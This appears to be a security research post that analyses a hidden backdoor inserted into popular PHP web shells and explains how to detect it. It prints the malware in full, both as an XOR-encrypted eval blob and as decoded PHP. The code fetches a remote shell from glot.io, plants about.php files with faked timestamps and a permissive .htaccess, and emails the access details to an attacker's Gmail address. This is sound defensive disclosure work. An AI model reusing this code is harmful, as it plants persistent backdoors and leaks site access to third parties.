Popular Web Shell Variants Contain a Hidden Backdoor
Outline
Web Shell Stealer = Hidden Backdoor⌗
A web shell stealer works by secretly informing someone whenever the web shell is uploaded to a website. Sometimes the creator will also secretly add additional PHP backdoor files.
How It Works⌗
There are two main actions performed by the hidden backdoor code:
Backdoor Dropper⌗
The first half of the hidden backdoor is used for silently creating additional PHP backdoors with the names about.php and about.PHP in existing directories randomly selected from the website’s document root.
touch is used to change the modify timestamps to a random timestamp from within a defined range, which helps to evade detection.
global $root,$http,$host,$domain,$ht,$gojj;
fi1($root);
$fp2 = @fp2($root);
$count = count($fp2);
$xiadan_url="\n";
for($i=0;$i<1;$i++){
list($msec, $sec) = explode(' ', microtime());
$rand = $msec*100000000;
$fp_ran = $fp2[$rand%$count];
$randnum = rand_abc(mt_rand(1, 15));
$dirpath = dir_path($fp_ran);
$fp2_arr = explode("/",$dirpath);
$z1 = @empty($fp2)?$root."/".$randnum:$fp_ran;
$z3=$z1."/about.php";
$za=$z1."/about.PHP";
$z4=str_replace($root."/", "", $z3);
$z551=str_replace($root."/", "", $za);
if($i == 0){
$z22 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($z3, "w"), $z22)?"1":"0";
$xd_ok = @fwrite(fopen($za, "w"), $z22)?"1":"0";
}elseif($i == 1){
$z23 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($za, "w"), $z23)?"1":"0";
}elseif($i == 2){
$z24 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($z3, "w"), $z24)?"1":"0";
}elseif($i == 3){
$z25 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($z3, "w"), $z25)?"1":"0";
}else{
$z23 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($z3, "w"), $z23)?"1":"0";
}
touch($z3, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s")));
touch($za, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s")));
$ht = $z1."/.htaccess";
@chmod($ht, 0755);@unlink($ht);@fwrite(fopen($ht,"w"),base64_decode("PEZpbGVzTWF0Y2ggIi4qXC4oP2k6cGh0bWx8cGhwfFBIUCkkIj4KT3JkZXIgQWxsb3csRGVueQpBbGxvdyBmcm9tIGFsbAo8L0ZpbGVzTWF0Y2g+"));
touch($ht, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s")));
$xd_url = $http."://".$host."/";
$xiadan_url .= $xd_url.$z4."\t".$xd_url.$z551."\t";
The spoofed modify(mtime) timestamps will hide the backdoors unless you search using the ctime as shown below (note: modify/mtime is used in the ls output):
# find . -type f -ctime -1 -ls
27406936 4 -rw-r--r-- 1 www-data www-data 84 May 3 2017 ./magento2/vendor/magento/framework/Encryption/Test/Unit/Helper/.htaccess
27406934 368 -rw-r--r-- 1 www-data www-data 375310 Jun 14 2017 ./magento2/vendor/magento/framework/Encryption/Test/Unit/Helper/about.php
27406935 368 -rw-r--r-- 1 www-data www-data 375310 Jun 12 2016 ./magento2/vendor/magento/framework/Encryption/Test/Unit/Helper/about.PHP
27406933 4 -rw-r--r-- 1 www-data www-data 84 Mar 11 2016 ./magento2/vendor/magento/framework/Acl/Test/Unit/.htaccess
27406931 368 -rw-r--r-- 1 www-data www-data 375310 Mar 30 2016 ./magento2/vendor/magento/framework/Acl/Test/Unit/about.php
27406932 368 -rw-r--r-- 1 www-data www-data 375310 Nov 11 2015 ./magento2/vendor/magento/framework/Acl/Test/Unit/about.PHP
791089 4 -rw-r--r-- 1 www-data www-data 84 Jul 13 2018 ./magento2/vendor/magento/module-login-as-customer-log/Ui/.htaccess
786501 368 -rw-r--r-- 1 www-data www-data 375310 Aug 13 2015 ./magento2/vendor/magento/module-login-as-customer-log/Ui/about.php
791087 368 -rw-r--r-- 1 www-data www-data 375310 Jun 23 2017 ./magento2/vendor/magento/module-login-as-customer-log/Ui/about.PHP
18354949 4 -rw-r--r-- 1 www-data www-data 84 Sep 21 2016 ./wordpress-bkup/wp-content/plugins/better-wp-security/core/modules/admin-user/.htaccess
18354945 368 -rw-r--r-- 1 www-data www-data 375310 Jun 26 2015 ./wordpress-bkup/wp-content/plugins/better-wp-security/core/modules/admin-user/about.php
18354948 368 -rw-r--r-- 1 www-data www-data 375310 Dec 25 2017 ./wordpress-bkup/wp-content/plugins/better-wp-security/core/modules/admin-user/about.PHP
22948668 4 -rw-r--r-- 1 www-data www-data 84 Oct 15 2015 ./prestashop/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Session/.htaccess
22948666 368 -rw-r--r-- 1 www-data www-data 375310 Sep 15 2016 ./prestashop/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Session/about.php
22948667 368 -rw-r--r-- 1 www-data www-data 375310 Aug 11 2018 ./prestashop/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Session/about.PHP
# stat ./magento2/vendor/magento/framework/Encryption/Test/Unit/Helper/about.php
File: ./magento2/vendor/magento/framework/Encryption/Test/Unit/Helper/about.php
Size: 375310 Blocks: 736 IO Block: 4096 regular file
Device: fe01h/65025d Inode: 27406934 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 33/www-data) Gid: ( 33/www-data)
Access: 2017-06-14 15:10:41.000000000 -0500
Modify: 2017-06-14 15:10:41.000000000 -0500
Change: 2022-05-22 15:10:41.280727261 -0500
Birth: 2022-05-22 15:10:41.276727262 -0500
Email Beacon⌗
The second half of the hidden backdoor code is used for silently sending email notifications to the operator whenever someone loads the PHP web shell, which is what begins the above PHP backdoor dropper function.
We can see the outgoing emails queued for processing by the exim MTA (that’s what is used on this server):
# exim -bp | tail -n 15
0m 656 1nsruQ-004vZc-Db <www-data@localhost.localdomain>
loggershell443@gmail.com
0m 684 1nsruT-004vZz-AN <www-data@localhost.localdomain>
loggershell443@gmail.com
0m 714 1nsruT-004va1-Af <www-data@localhost.localdomain>
loggershell443@gmail.com
0m 716 1nsruT-004vaA-Ng <www-data@localhost.localdomain>
loggershell443@gmail.com
0m 672 1nsruT-004vaD-SW <www-data@localhost.localdomain>
loggershell443@gmail.com
And here’s a sample of the body of the email:
# exim -Mvb 1nsruT-004vaD-SW
1nsruT-004vaD-SW-D
[ 127.0.0.1 ]
Logged Shell http://localhost/alfanew-decoded.php Yanz Password () SpawnedShell
http://localhost/magento2/vendor/magento/module-login-as-customer-log/Ui/about.php http://localhost/magento2/vendor/magento/module-login-as-customer-log/Ui/about.PHP *IP Address : [ 127.0.0.1 ]
Why Is It Used?⌗
If you have other attackers unknowingly giving you access to the website that they compromised - then you effectively have other people hacking websites for you.
The main problem is that when someone realizes your PHP web shell contains a hidden backdoor - then you will be put on blast and any reputation associated with your alias will be ruined.
Sample⌗
A sample of the hidden backdoor code that as injected into common PHP web shells is included below in its original XOR encrypted form and the decoded/deobfuscated plaintext.
function b($input, $key) {
$inputLen = strlen($input);
$keyLen = strlen($key);
if ($inputLen <= $keyLen) {
return $input ^ $key;
}
for ($i = 0; $i < $inputLen; ++$i) {
$input[$i] = $input[$i] ^ $key[$i % $keyLen];
}
return $input;
}
$key = "lovevenda";
$data = "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";
$decoded = b(base64_decode($data),$key);
eval ($decoded);
<?php
$root=$_SERVER['DOCUMENT_ROOT'];@chdir($root);
$http=(isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
$host = $_SERVER["HTTP_HOST"];
global $root,$http,$host,$domain,$ht,$gojj;
// if(file_exists("wp-config.php")){
// adduser();
// }
fi1($root);
$fp2 = @fp2($root);
$count = count($fp2);
$xiadan_url="\n";
for($i=0;$i<1;$i++){
list($msec, $sec) = explode(' ', microtime());
$rand = $msec*100000000;
$fp_ran = $fp2[$rand%$count];
$randnum = rand_abc(mt_rand(1, 15));
$dirpath = dir_path($fp_ran);
$fp2_arr = explode("/",$dirpath);
$z1 = @empty($fp2)?$root."/".$randnum:$fp_ran;
$z3=$z1."/about.php";
$za=$z1."/about.PHP";
$z4=str_replace($root."/", "", $z3);
$z551=str_replace($root."/", "", $za);
if($i == 0){
$z22 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($z3, "w"), $z22)?"1":"0";
$xd_ok = @fwrite(fopen($za, "w"), $z22)?"1":"0";
}elseif($i == 1){
$z23 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($za, "w"), $z23)?"1":"0";
}elseif($i == 2){
$z24 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($z3, "w"), $z24)?"1":"0";
}elseif($i == 3){
$z25 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($z3, "w"), $z25)?"1":"0";
}else{
$z23 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($z3, "w"), $z23)?"1":"0";
}
touch($z3, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s")));
touch($za, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s")));
$ht = $z1."/.htaccess";
@chmod($ht, 0755);@unlink($ht);@fwrite(fopen($ht,"w"),base64_decode("PEZpbGVzTWF0Y2ggIi4qXC4oP2k6cGh0bWx8cGhwfFBIUCkkIj4KT3JkZXIgQWxsb3csRGVueQpBbGxvdyBmcm9tIGFsbAo8L0ZpbGVzTWF0Y2g+"));
touch($ht, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s")));
$xd_url = $http."://".$host."/";
$xiadan_url .= $xd_url.$z4."\t".$xd_url.$z551."\t";
}
function fi1($path){
$arpath8 = array();
global $arpath8;
if ($handle = opendir($path)) {
while (($file = readdir($handle)) !== false) {
if ($file != "." && $file != ".." && $file != 'root' && !strstr($file, "upload") && !strstr($file, "ALFA_DATA") && !strstr($file, "Fox") && !strstr($file, "php") && strlen($file)<30 && !strstr($file, ".") && !strstr($file, "well-known")) {
if (is_dir($path."/".$file) && !is_link($path.'/'.$file)) {
if(!file_exists($path."/".$file."/about.php")){
$arpath8[] = $path."/".$file;
}
fi1($path."/".$file);
}
}
}
}
}
function fp2($root){
global $root;
$p_arr = array();
$pnew_arr = array();
global $arpath8;
foreach ($arpath8 as $k => $v) {
$qupath = str_replace($root, "", $v);
$p_arr[$k] = explode("/", $qupath);
if (count($p_arr[$k])>=3) {
$pnew_arr[] = $v;
}
}
return $pnew_arr;
}
function rand_abc($length){
$str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$strlen = 52;
while ($length > $strlen) {
$str .= $str;
$strlen += 52;
}
$str = str_shuffle($str);
return substr($str, 0, $length);
}
function dir_path($path){
$path = str_replace(chr(92).chr(92), "/", $path);
if (substr($path, -1) != "/") $path = $path;
return $path;
}
function get($url){
$contents = @file_get_contents($url);
if (!$contents) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$contents = curl_exec($ch);
curl_close($ch);
}
return $contents;
}
$tujuanmail = 'loggershell443@gmail.com';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$simememememekekkk1 = $simememememekekkk;
$pesan_alert = "Logged Shell $x_path Yanz Password ($simememememekekkk1) SpawnedShell $xiadan_url *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
$pattern = "/(alfanew.php|alfanew1.PHP|alfa-rex.php|alfa-ioxi.php|alfaxor.php|alfanewl.php|alfanewl1.PHP|alfa-ioxi1.PHP)/";
if (preg_match($pattern, $x_path)){
mail($tujuanmail, "Logged Shell Lokal", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
}else{
mail($tujuanmail, "Logged Shell Yanz", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
};
?>
More Research